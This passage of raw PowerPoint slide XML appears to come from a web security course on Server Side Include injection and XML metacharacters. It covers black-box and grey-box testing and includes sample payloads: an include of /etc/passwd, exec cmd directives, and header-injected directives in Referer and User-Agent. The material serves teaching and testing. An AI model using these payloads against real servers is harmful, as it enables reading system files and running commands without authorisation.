              <a:t>undecoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> query string, including a backward slash (\) followed by some special characters.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2150653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Some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>examples</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;!--#echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>="DATE_LOCAL" --&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1"/>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t> out the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1"/>
              <a:t>current</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t> time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;!--#include virtual="/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>-bin/counter.pl" --&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>to include the output of a CGI script.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;!--#include virtual="/footer.html" --&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>to include the content of a file or list files in a directory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;!--#exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>="ls" --&gt; to include the output of a system command.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> most web servers don't allow the use of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> directive to execute system commands.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2552529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Black Box </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>we could guess if SSI are supported just by looking at the content of the target web site. If it contains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0" err="1"/>
              <a:t>shtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> files, then SSI are probably supported, as this extension is used to identify pages containing these directives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>the next step consists of determining if an SSI injection attack is actually possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>To use Server Side Includes, one or more lines like the following must be included on the HTML page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;!—#exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>="/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>-bin/hits.pl"—&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>we need to test if we can provide data that is going to be displayed unmodified (for example, in an error message or forum post)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;!--#include virtual="/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>" --&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>If the application is vulnerable, the directive is injected and it would be interpreted by the server the next time the page is served, thus including the content of the Unix standard password file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The injection can be performed also in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t>HTTP headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, if the web application is going to use that data to build a dynamically generated page:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>GET / HTTP/1.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>: &lt;!--#exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>="/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> ax"--&gt; User-Agent: &lt;!--#include virtual="/proc/version"--&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="665972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Grey Box </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> we have access to the application source code, we can quite easily find out:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" u="sng" dirty="0"/>
              <a:t>If</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t> SSI directives are used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>. If they are, then the web server is going to have SSI support enabled, making SSI injection at least a potential issue to investigate.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" u="sng" dirty="0"/>
              <a:t>Where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>user input, cookie content and HTTP headers are handled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>. The complete list of input vectors is then quickly determined.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" u="sng" dirty="0"/>
              <a:t>How</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t> the input is handled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, what kind of filtering is performed, what characters the application is not letting through, and how many types of encoding are taken into account.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3659433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ssi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;!--#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>errmsg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="Sorry, I can't find that file, please send us an e-mail"--&gt; - Changes the error message output by a server error.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;!--#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> format="abbrev"--&gt; - When the #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> command is used, the file size will be expressed in rounded kilobytes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;!--#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>timefmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="A %B %d %Y %r"--&gt; - Will list time in format as the example, "Friday November 12, 1999 10:23:20 PM" when the #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>flastmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> command is used or the LAST_MODIFIED environment variable is displayed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4063022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
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>ssi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Echo:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;!--#echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="DOCUMENT_NAME"--&gt; - Outputs the name of the document the script was invoked from.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;!--#echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="LAST_MODIFIED"--&gt; - Outputs the date and time the file was last modified.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exec:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;!--#exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-bin/hits.pl"--&gt; - Runs the server side script.hits.pl.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;!--#exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="ls -al"--&gt; - Performs a directory listing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="367744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a:t>Discovery</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Segnaposto testo 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3403721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
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>ssi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>commands</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Fsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;!--#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file="main.shtml"--&gt; - Displays the size of the file "main.html".</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Flastmod</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;!--#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>flastmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file="main.shtml"--&gt; - Displays the date the file was last modified.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Flastmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> may be used as follows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;H3&gt;The last time main.shtml was modified was on &lt;!--#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>flastmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> filer="main.shtml"--&gt;.&lt;/H3&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Include</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;!--#include file="more.html"--&gt; - Includes the contents of the more.html file in the current file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="218616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Xml </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Metacharacters</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto contenuto 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>Single quote: ‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>node</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>attrib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>='$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>inputValue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>'/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>inputValue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>node</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>attrib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>''/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="it-IT" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>Double quote: ‘’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>node</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
